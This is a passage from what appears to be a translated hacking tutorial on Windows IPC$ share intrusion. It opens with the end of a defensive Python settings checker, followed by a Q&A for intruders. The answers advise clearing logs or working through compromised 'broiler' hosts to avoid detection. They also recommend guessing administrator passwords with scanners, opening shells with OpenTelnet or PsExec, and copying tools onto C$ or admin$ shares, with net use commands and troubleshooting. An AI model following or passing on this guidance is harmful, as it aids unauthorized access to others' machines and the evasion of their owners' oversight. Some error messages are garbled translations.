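                      (LANMAN, "AutoShareWks"), (NETBT, "SMBDeviceEnabled")):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key.split("\\", 1)[1]) as h:
                out[(key, name)] = winreg.QueryValueEx(h, name)[0]
        except OSError:
            out[(key, name)] = None
    return out


if __name__ == "__main__":
    for finding in assess(STOCK_W2K_SERVER, True, listening_tcp_ports(STOCK_NETSTAT)):
        print("-", finding)
```

On a real host, feed read_live_settings() and the output of netstat -an into assess(); the order of the findings mirrors the numbered measures above, so the list doubles as a to-do list.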
15. Selected IPC$ intrusion questions and answers

That was a lot of theory; in practice you will run into all sorts of problems. To help as much as possible, I have collected some of the most representative questions and answers from the security forums. Some of the answers are mine, some are replies from the forums. If you have questions, come and discuss them with me.
1. When an ipc$ intrusion is carried out, records are left on the server. Is there any way to keep the server from discovering it?
A: Records will certainly be left. Afterwards you can delete them with a log-clearing program, or carry out the intrusion through a broiler.
2. Below, why can I connect but not copy?
net use \\***.***.***.***\ipc$ "password" /user:"username"
Command succeeded
copy icmd.exe \\***.***.***.***\admin$
The network path could not be found
Command not successful
A: Errors like "network path not found" or "network name not found" mostly mean that the shared directory you want to copy to is not open, so the copy fails; try other shared directories.
3. Suppose the other side has ipc$ open and I can establish a null connection, but opening the C and D drives asks for a password. I know a null connection does not have much access, but is there any other way?
A: We recommend using Streamer or some other scanning software to try to guess the password. If you cannot guess it, you can only give up; after all, the abilities of a null connection are limited.
4. I have guessed the administrator's password and the ipc$ connection succeeded, but net view \\ip shows that the default shares are not open. What should I do?
A: First let me correct a mistake of yours: net view \\ip cannot show the default shares. Try copying a file to C$ or D$; if that fails, it means he has closed the default shares, and you can use OpenTelnet.exe or PsExec.exe with the method described above.
5. The ipc$ connection succeeded and I created an account with the following command, but the account turned up on my own machine. What is going on?
net user ccbirds /add
A: A successful ipc$ connection only means you have a communication channel with the remote host; it does not mean you have a shell. Only after you get a shell (for example via Telnet) can you create an account on the remote machine; otherwise your operation only takes effect locally.
6. I got into a broiler using the administrator account. I can see its system time, but copying a program to it fails, each time prompting "Access is denied. 0 file(s) copied." Is it that the other side has some service not running? What should I do?
A: Generally speaking, "access denied" results from insufficient permissions; possibly the account you are using has a problem. Another possibility: if you are copying to an ordinary shared directory and get this error, it means the permissions set on that directory do not include you (even if you are an administrator), as I analyzed in the previous section.
7. Can I use Win98 to establish an ipc$ connection with the other side?
A: In principle, no. To carry out ipc$ operations it is recommended to use Win2000; other operating systems bring a lot of unnecessary trouble.
8. I successfully established a null session with net use \\ip\ipc$ "" /user:"", but I cannot dump the user list with nbtstat -a ip. Why?
A: A null session can dump the user list by default, but if the administrator has disabled that by editing the registry, you get this situation. It is also possible that your own NBT is not enabled; the nbtstat command is built on NBT.
9. When I establish an ipc$ connection, the following message is returned: 'The supplied credentials conflict with an existing set of credentials'. What is going on?
A: Oh, this indicates that you have already established an ipc$ connection with the target host. Two hosts are not allowed to establish two ipc$ connections at the same time.
10. The following appears when I map:
F:\>net use H: \\211.161.134.*\e$
The system has a 85 error.
The local device name is already in use. What is going on?
A: You are too careless: it means you already have an H: drive, so map to a different drive letter!
11. I created the connection f:\>net use \\*.*.*.*\ipc$ "123" /user:"Guest" successfully, but when I mapped, an error occurred and I was asked for a password. What is going on?
F:\>net use H: \\*.*.*.*\c$
Password is invalid in \\*.*.*.*\c$.
Please type \\*.*.*.*\c$ password:
The system has a 5 error.
Refusal to access the interview.
A: Hehe. Being asked for a password means the rights of the user you are currently using are insufficient, so you cannot map the C$ default share. Find a way to raise your permissions, or find the administrator's weak password!
The default shares usually require administrator privileges.
12. I used SuperScan to scan a host with port 139 open, but why can't I make a null connection?
A: You are confusing the relationship between ipc$ and 139. A host that accepts ipc$ connections must have port 139 or 445 open, but a host with those two ports open may not accept a null connection, because the other side can turn off ipc$ sharing.
13. The machines on our LAN are mostly XP. I scanned with Streamer and found several administrator accounts with empty passwords, and I can connect, but I cannot copy anything; it says error 5.
May I ask why?
A: XP is much more secure. In the default security policy settings, when a network logon authenticates against a local account, guest privileges are applied: even if you log on remotely as the administrator, you only have guest permissions, so when you copy a file you naturally get error 5: insufficient permissions.
14. net use \\192.168.0.2\ipc$ "password" /user:"Administrator" succeeds, but net use I: \\192.168.0.2\c
prompts "type the password for \\192.168.0.2". What is going on? I am using the administrator account; shouldn't I have access to everything?
A: Although you have administrator privileges, when the administrator set the sharing permissions on the C drive (note: ordinary shares can have access permissions set; the default shares cannot), he may not have granted administrator access, so this problem occurs.
15. If your own machine has ipc$ disabled, can you still use ipc$ to connect to other machines? What if the Server service is disabled?
A: With both of those disabled you can still initiate ipc$ connections; questions like this are better settled by testing them yourself.
16. Can you tell me the reason for the following two errors?
C:\>net time \\61.225.*.*
The system has a 5 error.
Refusal to access the interview.
C:\>net view \\61.225.*.*
The system has a 5 error.
Refusal to access the interview.
A: I was very puzzled when I first encountered this problem. Error 5 means insufficient permissions, but the two commands above can be completed with the privileges of a null session, so why couldn't he? Had he not established a connection? Then the careless comrade told me that was indeed the case: he had forgotten that he had already deleted the ipc$ connection, and then entered the two commands above, hence error 5.
17. Do you see what is going on here?
F:\>net time
The time server could not be found.
Please type NET helpmsg 3912 for a lot of other help.
A: The answer is easy. Your command is wrong; it should be net time \\ip.
Without an IP address, of course the server cannot be found. The view command should also carry an IP address: net view \\ip